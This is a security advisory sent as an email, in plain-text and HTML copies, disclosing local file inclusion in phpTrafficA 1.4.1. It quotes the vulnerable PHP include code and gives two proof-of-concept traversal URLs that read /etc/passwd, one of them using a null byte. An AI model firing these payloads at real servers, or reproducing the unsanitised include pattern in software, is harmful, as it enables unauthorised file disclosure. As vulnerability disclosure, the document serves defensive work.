------=_Part_16228_26164291.1172086007407
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

phpTrafficA-1.4.1  Local File Inclusion

phpTrafficA is a GPL statistical tool for web traffic analysis, written in
php and mySQL.
It can track access counts to your website, search engines, keywords, and
referrers that lead to you, operating systems, web browsers, visitor
retention, path analysis, and a lot more!

http://soft.zoneo.net/phpTrafficA/


Credit:
The information has been provided by Hamid Ebadi
The original article can be found at : http://www.bugtraq.ir

Vulnerable Systems:
Version: phpTrafficA-1.4.1
     phpTrafficA-1.4beta4
     (also tested on phpTrafficA-1.3)

Description:
Input passed to the "file" parameter in "plotStat.php"  and "lang" parameter
in "banref.php" is not  properly verified, before it is used to include
files.
This can be exploited to include/see arbitrary files from local resources.


read more about file inclusion in http://www.bugtraq.ir/articles

Vulnerable Code :
//phpTrafficA/plotStat.php
//Vulnerable Code :line 14
if (!isset($file) or $file=="") {$file = $_GET['file'];}
include("./Php/phplot.php");
include("./tmp/".$file);



//phpTrafficA/plotStat.php
//Vulnerable Code :line 16
if (!isset($lang) or $lang == "") {
    $lang = $_GET["lang"];
    if ($lang == "") { $lang = $_POST["lang"];}
}
include ("./Lang/$lang.php");


POC exploit :
The following URL will cause local file inclusion

http://[HOST]/phpTrafficA/plotStat.php?file=/../../../../../../../../../etc/passwd
http://[HOST]/phpTrafficA/banref.php?lang=/../../../../../../../../../etc/passwd%00

# http://www.bugtraq.ir

------=_Part_16228_26164291.1172086007407
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

phpTrafficA-1.4.1&nbsp; Local File Inclusion<br><br>phpTrafficA is a GPL statistical tool for web traffic analysis, written in php and mySQL.<br>It can track access counts to your website, search engines, keywords, and referrers that lead to you, operating systems, web browsers, visitor retention, path analysis, and a lot more!
<br><br><a href="http://soft.zoneo.net/phpTrafficA/">http://soft.zoneo.net/phpTrafficA/</a><br><br><br>Credit:<br>The information has been provided by Hamid Ebadi<br>The original article can be found at : <a href="http://www.bugtraq.ir">
http://www.bugtraq.ir</a><br><br>Vulnerable Systems:<br>Version: phpTrafficA-1.4.1<br>&nbsp;&nbsp; &nbsp; phpTrafficA-1.4beta4 <br>&nbsp;&nbsp; &nbsp; (also tested on phpTrafficA-1.3)<br><br>Description:<br>Input passed to the &quot;file&quot; parameter in &quot;
plotStat.php&quot;&nbsp; and &quot;lang&quot; parameter in &quot;banref.php&quot; is not&nbsp; properly verified, before it is used to include files.<br>This can be exploited to include/see arbitrary files from local resources.<br>
<br><br>read more about file inclusion in <a href="http://www.bugtraq.ir/articles">http://www.bugtraq.ir/articles</a><br><br>Vulnerable Code :<br>//phpTrafficA/plotStat.php<br>//Vulnerable Code :line 14<br>if (!isset($file) or $file==&quot;&quot;) {$file = $_GET[&#39;file&#39;];}
<br>include(&quot;./Php/phplot.php&quot;);<br>include(&quot;./tmp/&quot;.$file);<br><br><br><br>//phpTrafficA/plotStat.php<br>//Vulnerable Code :line 16<br>if (!isset($lang) or $lang == &quot;&quot;) {<br>&nbsp;&nbsp; &nbsp;$lang = $_GET[&quot;lang&quot;];
<br>&nbsp;&nbsp; &nbsp;if ($lang == &quot;&quot;) { $lang = $_POST[&quot;lang&quot;];}<br>}<br>include (&quot;./Lang/$lang.php&quot;);<br><br><br>POC exploit :<br>The following URL will cause local file inclusion<br><br>http://[HOST]/phpTrafficA/plotStat.php?file=/../../../../../../../../../etc/passwd
<br>http://[HOST]/phpTrafficA/banref.php?lang=/../../../../../../../../../etc/passwd%00<br><br># <a href="http://www.bugtraq.ir">http://www.bugtraq.ir</a>

------=_Part_16228_26164291.1172086007407--